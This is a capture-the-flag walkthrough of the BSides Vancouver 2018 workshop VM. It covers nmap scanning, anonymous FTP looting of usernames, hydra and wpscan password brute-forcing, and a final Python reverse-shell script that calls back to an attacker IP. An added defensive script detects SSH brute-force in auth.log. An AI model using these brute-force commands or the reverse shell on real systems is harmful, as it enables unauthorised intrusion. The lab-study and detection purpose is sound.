Overview:
Name: BSides Vancouver: 2018 (Workshop)
Date release: 21 Mar 2018
Author: abatchy
Series: BSides Vancouver
Web page: https://www.abatchy.com/projects
Download:
https://www.dropbox.com/s/j3r9l7kaydwsdm9/BSides-Vancouver-2018-Workshop.ova
Method 1: attacking the host services
Scan to discover the host IP:
Detailed host enumeration
╰─ nmap -v -p1-65535 -sV -O -sT 10.10.202.130
….
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.5
22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1.10 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.2.22 ((Ubuntu))
MAC Address: 00:0C:29:E9:7F:EE (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Uptime guess: 0.672 days (since Wed Mar 6 19:54:37 2019)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=249 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
FTP anonymous login attempt
Anonymous login works, and a backup file containing user names is collected:
╰─ cat users.txt.bk
abatchy
john
mai
anne
doomguy
SSH login attempts
After trying each of the collected users, only anne has password authentication enabled, so next we brute-force that account.
Wordlists:
git clone https://github.com/danielmiessler/SecLists.git
Kali Linux: /usr/share/wordlists/rockyou.txt
╰─ hydra -l anne -P /opt/SecLists/Passwords/Common-Credentials/10k-most-common.txt 10.10.202.130 ssh
╰─ hydra -l anne -P /usr/share/wordlists/rockyou.txt 10.10.202.130 ssh
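From the defender's side, the password-guessing step above leaves a very recognisable trail in sshd's auth.log. The following Python script is an added example, not part of the original writeup: it parses sshd password events, flags a source/user pair that accumulates a threshold of failures inside a sliding time window, and raises a second alert if that pair then logs in successfully. The log lines are constructed for this example, and the year passed to the parser is an assumption because syslog timestamps carry none.

```python
import re
from collections import defaultdict
from datetime import datetime
# sshd password events as written to auth.log ("invalid user" marks unknown names).
LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?"
    r"(?P<user>\S+) from (?P<src>\S+) port \d+"
)

# Constructed sample: a burst of failures against anne, then a success.
SAMPLE_LOG = """\
Mar  7 10:12:01 bsides sshd[2201]: Failed password for anne from 10.10.202.136 port 40110 ssh2
Mar  7 10:12:02 bsides sshd[2203]: Failed password for anne from 10.10.202.136 port 40112 ssh2
Mar  7 10:12:02 bsides sshd[2205]: Failed password for invalid user doomguy from 10.10.202.136 port 40114 ssh2
Mar  7 10:12:03 bsides sshd[2207]: Failed password for anne from 10.10.202.136 port 40116 ssh2
Mar  7 10:12:04 bsides sshd[2209]: Failed password for anne from 10.10.202.136 port 40118 ssh2
Mar  7 10:12:05 bsides sshd[2211]: Failed password for anne from 10.10.202.136 port 40120 ssh2
Mar  7 10:12:07 bsides sshd[2213]: Accepted password for anne from 10.10.202.136 port 40122 ssh2
""".splitlines()

def parse_line(line, year=2019):
    """Return (timestamp, result, user, src) for a password event, else None."""
    m = LINE_RE.match(line)
    if not m:
        return None
    # syslog timestamps carry no year, so one is assumed (2019 here).
    ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
    return ts, m["result"], m["user"], m["src"]

def detect_bruteforce(lines, threshold=5, window_s=60):
    """Alert on `threshold` failures per (src, user) inside window_s seconds,
    and again if that pair then logs in successfully."""
    failures = defaultdict(list)  # (src, user) -> recent failure timestamps
    alerts = []
    for line in lines:
        ev = parse_line(line)
        if ev is None:
            continue
        ts, result, user, src = ev
        recent = failures[(src, user)]
        while recent and (ts - recent[0]).total_seconds() > window_s:
            recent.pop(0)  # slide the window forward
        if result == "Failed":
            recent.append(ts)
            if len(recent) == threshold:
                alerts.append(("bruteforce", src, user))
        elif len(recent) >= threshold:
            alerts.append(("success-after-bruteforce", src, user))
    return alerts
```

Feeding the script a real auth.log (`detect_bruteforce(open("/var/log/auth.log"))`) gives the same alert tuples; the one-off success-after-bruteforce alert is the one worth paging on, since it means the guessed password worked.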
Method 2: starting from the web
Directory enumeration with dirb
╰─ dirb http://10.10.202.130/
Scan with WPScan
# wpscan --update
# wpscan --url http://10.10.202.130/backup_wordpress/ --enumerate u # user enumeration
Password brute-force
╰─ wpscan --url http://10.10.202.131/backup_wordpress/ --wordlist /opt/SecLists/Passwords/Common-Credentials/10k-most-common.txt --username john
Privilege escalation
./LinEnum.sh >> LinEnum.log
Shell.sh
#!/bin/bash
python -c 'import socket,subprocess,os; s=socket.socket(socket.AF_INET, socket.SOCK_STREAM); s.connect(("10.10.202.136",4321));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); p=subprocess.call(["/bin/sh","-i"]);'